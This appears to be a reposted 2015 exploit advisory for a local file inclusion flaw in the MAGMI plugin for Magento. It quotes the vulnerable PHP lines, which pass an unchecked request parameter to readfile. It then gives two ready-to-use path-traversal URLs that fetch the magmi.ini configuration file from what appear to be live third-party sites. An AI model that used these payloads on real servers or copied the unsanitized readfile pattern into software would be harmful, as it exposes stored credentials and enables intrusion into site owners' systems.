facebook facebook twitter rss

Magento Server MAGMI Plugin Local File Inclusion

Author: lOv3rDns , Published: 22-06-2015
Title :  Magento Server MAGMI Plugin Local File Inclusion
Auther : Lov3rDns
PageHome : http://pastebin.com/u/dnsx3
4U : Exploit4arab.net
Software : http://sourceforge.net/projects/magmi/
Date: 16-6-2015

The vulnerable code is as follows [ /web/download_file.php Line : 26 ]

$file = $_REQUEST["file"];
readfile($file); # < hah !

Example :

http://demo.meigeeteam.com/shopgram-magento-theme/magmi/web/download_file.php?file=../conf/magmi.ini

http://mail.nupathe.com/hotelsboutiquespain.comx/magentomassim/web/download_file.php?file=../conf/magmi.ini


+++++++++++++++++++++++++++

Like us on Facebook :